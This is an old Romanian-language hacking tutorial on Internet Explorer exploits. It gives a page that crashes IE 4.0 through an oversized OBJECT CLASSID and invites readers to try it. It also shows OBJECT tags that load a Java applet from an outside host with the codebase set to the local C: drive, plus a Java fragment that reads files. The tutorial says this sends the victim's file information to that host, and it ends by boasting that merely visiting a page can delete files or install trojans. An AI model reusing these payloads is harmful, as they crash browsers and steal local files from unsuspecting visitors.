Exploit IE.5

In acest tutorial o sa ne ocupam de exploituri pentru MSIE pentru ca am vazut ca va intereseaza.
Stiati ca urmatoarea secventa de cod poate cauza prabusirea browserului dvs,daca folositi IE4.0?

<HTML><head><title>
Prabuseste IE 4.0</title></head><body>
<OBJECT
CLASSID=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111>
</OBJECT></body>
</HTML>
Luati acest cod si salvati-l ca fisier *.htm.Vedeti rezultatul.

In continuare este prezentat pericolul potential cauzat de appleturi java.

<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.nebunu.home.ro/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>

<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.nebunu.home.ro/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>

-gjavacodebase.java-------------------------------------------
......
try
{
u = new URL(getParameter("URL"));
InputStream is=u.openStream();
byte ba[]=new byte[1000];
int l=is.read(ba);
InputStream os=u.openConnection().getInputStream();
String s1=new String(ba,0,l);

print(u.toString());
print(s1);
}
.......

Appleturile pot citi URL-uri si comunica cu gazdele lor direct din sistemul dvs de fisiere.!
Mai precis comunica cu www.nebunu.home.ro si transmite informatii despre fisierele voastre.!

Am primit foarte multe mailuri privitoare la programul EXE2HTML.Nu stiu de unde sa incep.As dori sa va documentati intai asupra programarii orientate pe obiecte in special VBscript si Javascript,poate ca o sa scriu un tutorial pe aceasta tema.Totusi un raspuns decisiv pot sa va dau:DOAR VIZITAND O PAGINA WEB SE POATE OBTINE FULL CONTROL ASUPRA SISTEMULUI DE OPERARE.Exemplul prezentat priveste numai IE5.0 dar in curand voi lansa o noua versiune care privste toate MSIE!Doar accesand pagina se pot sterge fisiere,infiltra troieni,virusi,viermi...tot ce va trece prin cap.O sa lansez o pagina web care iti instaleaza MSDOS-ul!!!!!

email::ciuri@go.ro